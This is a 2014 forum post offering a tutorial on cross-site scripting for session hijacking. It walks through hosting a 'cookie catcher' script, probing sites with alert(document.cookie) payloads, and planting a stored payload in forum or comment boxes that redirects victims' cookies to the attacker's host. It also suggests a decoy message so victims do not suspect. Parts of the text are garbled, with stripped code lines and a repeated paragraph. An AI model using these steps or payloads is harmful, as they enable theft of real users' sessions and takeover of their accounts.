Hello Guys Today i will write a Complete Tutorial on XSS. First Of All XSS is in 2 Types, Persistent and Non-Persistent type. For XSS we will use something called a Cookie Catcher. Question will be that why we would need someones else cookies? The answer is that we can change our browsers cookies to login as them!!! So lets call it Session Hijacking. First go to a free hosting site like 110mb or any other php hosting sites and register there. Then download this cookie catcher and upload it. Cookie Catcher: adf.ly/1I5oz What does the cookie catcher do? It grabs the users: o Cookies o IP o Referral Link. Which Page is attached to that Link o Time And Date Get Vulnerable sites: Ok first we need sites that are vulnerable to XSS so it will work on them. To test it we will need to add a code after the link. I will use this site that many of you probably saw it before. adf.ly/Tdo3 Now for testing If a site is vulnerable or not you can add these codes: Code: >alert(document.cookie) Code: >alert(document.cookie) Code: >alert(Test) Code: >alert(Test) Or a new one which i found out myself in which you can inject HTML: Code: > Code: > Then if we see a java script popup like this: IMG unavailable Or if you used my testing and you saw the pages background go black or a page of google opens in that site it means its vulnerable to XSS attack. In the end, if your site is example The link to test it would be: example/index.php?id=>alert(document.cookie) Or if you used my testing and you saw the pages background go black or a page of google opens in that site it means its vulnerable to XSS attack. In the end, if your site is example The link to test it would be: example/index.php?id=>alert(document.cookie) Persistent XSS: In this method we will grab the victims cookies with no suspection and completely stealth. Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS. Ok now lets go to this site: adf.ly/1I6ns Now test and see if the XSS vulnerable test work on it. It does!!! And your getting one of the vulnerabilitys symptoms. So now lets try to grab its cookies. If there is a box to type or submit it, add this: Code: document.location=you.110mb/cookie catcher.php?c= + document.cookie and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in??? so they wont suspect you. Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: example/cookie catcher.php The container of the cookies would be: example/cookies.html Now visit cookies.html and you would see the session of that cookie! Now there is another way for a cookie grabbing drive by, add this code and post it: Code:
Posted on: Mon, 15 Dec 2014 11:48:01 +0000
Trending Topics
Recently Viewed Topics
© 2015